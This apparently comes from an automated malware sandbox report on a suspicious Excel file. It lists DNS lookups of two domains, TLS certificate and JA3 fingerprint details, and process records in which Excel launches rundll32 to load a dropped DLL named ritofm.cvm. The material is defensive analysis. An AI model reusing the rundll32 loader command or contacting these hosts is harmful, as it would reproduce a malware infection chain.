                                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                          May 12, 2021 16:46:16.531647921 CEST8.8.8.8192.168.2.40xe5dbNo error (0)signifysystem.com192.185.39.58A (IP address)IN (0x0001)
                                                                                                                                                                                          May 12, 2021 16:46:17.366645098 CEST8.8.8.8192.168.2.40x9c12No error (0)fcventasyservicios.cl192.185.32.232A (IP address)IN (0x0001)

                                                                                                                                                                                          HTTPS Packets

                                                                                                                                                                                          TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                                                          May 12, 2021 16:46:16.864312887 CEST192.185.39.58443192.168.2.449732CN=cpcontacts.signifysystem.com CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Thu Apr 01 17:00:25 CEST 2021 Wed Oct 07 21:21:40 CEST 2020Wed Jun 30 17:00:25 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                                                          CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                                                                                                                                                                                          May 12, 2021 16:46:17.700875998 CEST192.185.32.232443192.168.2.449733CN=mail.fcventasyservicios.cl CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Tue Mar 16 13:01:12 CET 2021 Wed Oct 07 21:21:40 CEST 2020Mon Jun 14 14:01:12 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                                                          CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021

                                                                                                                                                                                          Code Manipulations

                                                                                                                                                                                          Statistics

                                                                                                                                                                                          CPU Usage

                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                          Memory Usage

                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                          High Level Behavior Distribution

                                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                                          Behavior

                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                          System Behavior

                                                                                                                                                                                          General

                                                                                                                                                                                          Start time:16:46:09
                                                                                                                                                                                          Start date:12/05/2021
                                                                                                                                                                                          Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                          Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                                                          Imagebase:0xec0000
                                                                                                                                                                                          File size:27110184 bytes
                                                                                                                                                                                          MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                          General

                                                                                                                                                                                          Start time:16:46:18
                                                                                                                                                                                          Start date:12/05/2021
                                                                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                          Commandline:rundll32 ..\ritofm.cvm,DllRegisterServer
                                                                                                                                                                                          Imagebase:0x1140000
                                                                                                                                                                                          File size:61952 bytes
                                                                                                                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                          General

                                                                                                                                                                                          Start time:16:46:18
                                                                                                                                                                                          Start date:12/05/2021
                                                                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                          Commandline:rundll32 ..\ritofm.cvm1,DllRegisterServer
                                                                                                                                                                                          Imagebase:0x1140000
                                                                                                                                                                                          File size:61952 bytes
                                                                                                                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                          Disassembly

                                                                                                                                                                                          Code Analysis

                                                                                                                                                                                          Reset < >